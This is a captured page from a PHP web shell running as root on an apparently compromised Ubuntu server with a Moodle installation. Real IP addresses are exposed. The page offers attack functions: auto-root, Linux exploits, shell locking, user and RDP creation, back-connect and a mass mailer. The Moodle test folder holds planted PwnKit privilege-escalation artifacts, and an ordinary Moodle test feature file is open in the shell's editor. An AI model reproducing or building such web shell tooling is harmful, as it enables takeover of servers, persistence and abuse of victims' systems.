Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tool /
lp /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_tool_lp.php
5.46
KB
-rwxrwxrwx
behat_tool_lp_data_generators....
12.48
KB
-rwxrwxrwx
course_competencies.feature
2.78
KB
-rwxrwxrwx
framework_crud.feature
6.2
KB
-rwxrwxrwx
plan_crud.feature
7
KB
-rwxrwxrwx
plan_workflow.feature
8.72
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
template_crud.feature
2.93
KB
-rwxrwxrwx
user_evidence_comp_link.featur...
2.95
KB
-rwxrwxrwx
user_evidence_crud.feature
3.29
KB
-rwxrwxrwx
view_competencies.feature
9.49
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user_evidence_crud.feature
@tool @javascript @tool_lp @tool_lp_user_evidence Feature: Manage evidence of prior learning In order to perform CRUD operations on evidence of prior learning As a user I need to create, update and delete evidence of prior learning Background: Given the following "users" exist: | username | firstname | lastname | email | |user1 | User | 1 | user1@example.com | When I log in as "user1" And I follow "Profile" in the user menu And I follow "Learning plans" Then I should see "Evidence of prior learning" Scenario: Create a new evidence of prior learning Given I follow "Evidence of prior learning" And I should see "List of evidence" When I click on "Add new evidence" "button" And I set the field "Name" to "Evidence-1" And I set the field "Description" to "Evidence-1 description" And I press "Save changes" Then I should see "Evidence of prior learning created" And I should see "Evidence-1" Scenario: Read an evidence of prior learning Given the following lp "userevidence" exist: | name | description | user | | Evidence-2 | Evidence-2 description | user1 | And I follow "Evidence of prior learning" And I should see "List of evidence" And I should see "Evidence-2" When I click on "Evidence-2" "link" Then I should see "Evidence-2" Scenario: Edit an evidence of prior learning Given the following lp "userevidence" exist: | name | description | user | | Evidence-3 | Evidence-3 description | user1 | And I follow "Evidence of prior learning" And I should see "List of evidence" And I click on "Edit" of edit menu in the "Evidence-3" row And the field "Name" matches value "Evidence-3" When I set the field "Name" to "Evidence-3 Edited" And I press "Save changes" Then I should see "Evidence of prior learning updated" And I should see "Evidence-3 Edited" Scenario: Delete an evidence of prior learning Given the following lp "userevidence" exist: | name | description | user | | Evidence-4 | Evidence-4 description | user1 | And I follow "Evidence of prior learning" And I should see "List of evidence" And I click on "Delete" of edit menu in the "Evidence-4" row And I click on "Cancel" "button" in the "Confirm" "dialogue" And I click on "Delete" of edit menu in the "Evidence-4" row And "Confirm" "dialogue" should be visible When I click on "Delete" "button" in the "Confirm" "dialogue" And I wait until the page is ready Then I should not see "Evidence-4" Scenario: List evidences of prior learning Given the following "users" exist: | username | firstname | lastname | email | |user2 | User | 2 | user2@example.com | And the following lp "userevidence" exist: | name | description | user | | Evidence-5 | Evidence-5 description | user1 | | Evidence-6 | Evidence-6 description | user2 | And I follow "Evidence of prior learning" And I should see "List of evidence" And I should see "Evidence-5" When I log out And I log in as "user2" And I follow "Profile" in the user menu And I follow "Learning plans" And I follow "Evidence of prior learning" Then I should see "List of evidence" And I should see "Evidence-6" And I should not see "Evidence-5"
Close